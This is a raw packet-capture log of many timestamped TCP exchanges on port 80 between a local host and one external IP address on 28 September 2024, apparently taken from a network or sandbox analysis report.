                                                                    Sep 28, 2024 17:52:14.057121992 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.097799063 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.097856998 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.097871065 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.097879887 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.097912073 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.097920895 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.098187923 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.098203897 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.098226070 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.098228931 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.098242044 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.098248959 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.098258018 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.098273993 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.098284006 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.098294973 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100261927 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100277901 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100291967 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100307941 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100313902 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100326061 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100342989 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100342035 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100361109 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100368977 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100390911 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100390911 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100394011 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100410938 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100416899 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100428104 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.100438118 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100455999 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.100476980 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101049900 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101064920 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101087093 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101099014 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101100922 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101111889 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101119041 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101125956 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101135015 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101151943 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101160049 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101160049 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101166964 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101171017 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101183891 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101192951 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101202965 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101202965 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101222992 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101243019 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101450920 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101466894 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101481915 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101492882 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101496935 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101505995 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101515055 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101526976 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101531029 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101538897 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101550102 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.101557016 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101571083 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.101593018 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104140997 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104165077 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104180098 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104195118 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104208946 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104211092 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104219913 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104224920 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104240894 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104242086 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104257107 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104266882 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104274035 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104284048 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104290009 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104302883 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104305983 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104315996 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104324102 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104336023 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104340076 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104347944 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104357958 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104367018 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104374886 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104377985 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104391098 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104399920 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104408026 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104410887 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104424000 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104429007 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104440928 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104448080 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104459047 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104465961 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104480982 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104485035 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104501963 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.104505062 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104518890 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.104540110 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105227947 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105242968 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105257034 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105273008 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105282068 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105283976 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105298996 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105302095 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105317116 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105321884 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105331898 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105341911 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105348110 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105354071 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105365038 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105365038 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105381966 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105391026 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105397940 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105401039 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105416059 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105421066 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105432987 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105436087 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105448008 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105456114 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105463982 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105474949 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105479956 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105488062 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105499029 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105500937 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105514050 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.105520010 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105536938 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.105551958 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106801033 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106817961 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106831074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106843948 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106842995 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106853962 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106862068 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106873035 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106878042 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106892109 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106894970 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106901884 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106911898 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106928110 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106929064 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106941938 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106945992 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106952906 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106965065 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.106967926 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.106981993 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.107002020 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.137820005 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.137835979 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.137851954 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.137919903 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.137939930 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.138144016 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.138159990 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.138175964 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.138189077 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.138194084 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.138202906 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.138231993 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.138247967 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.138818979 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.138869047 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.139403105 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.139419079 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.139434099 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.139446020 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.139451981 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.139457941 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.139468908 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.139477968 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.139486074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.139494896 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.139512062 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.139527082 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147219896 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147289038 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147447109 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147464037 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147495985 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147522926 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147742987 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147758961 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147774935 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147783995 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147793055 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.147804976 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147821903 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.147835970 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.148344040 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148361921 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148377895 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148392916 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148407936 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148417950 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.148417950 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.148430109 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148446083 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.148463011 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.148482084 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188246965 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188339949 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188431978 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188447952 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188483953 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188497066 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188713074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188729048 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188757896 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188775063 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188868999 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188890934 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188905001 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188911915 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188921928 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188922882 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188941002 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.188947916 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188956976 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.188981056 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.189549923 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.189565897 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.189588070 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.189603090 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.189610958 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.189610958 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.189631939 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.189646006 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191417933 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191469908 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191509962 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191524982 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191550970 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191566944 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191611052 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191627979 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191643000 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191654921 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191659927 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.191668034 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191684961 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.191698074 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.192251921 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.192296028 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.192675114 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.192717075 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.192809105 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.192826033 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.192851067 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.192867994 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193042994 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193061113 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193075895 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193089962 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193090916 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193101883 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193105936 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193123102 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193140984 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193531990 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193547964 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193562984 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193578959 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193587065 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193593979 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193605900 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193610907 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.193636894 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.193650961 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195219040 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195271015 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195380926 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195404053 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195430040 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195447922 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195601940 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195617914 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195643902 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195660114 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195847034 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195862055 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195878029 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195892096 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195893049 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.195903063 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195921898 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.195936918 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196268082 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196284056 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196299076 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196310997 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196315050 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196322918 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196341038 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196358919 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196806908 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196821928 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196836948 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196851015 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196854115 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196866035 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196866989 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196876049 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196883917 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196893930 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196899891 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196908951 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196916103 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196928024 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:14.196934938 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:14.196950912 CEST4973080192.168.2.484.201.150.223
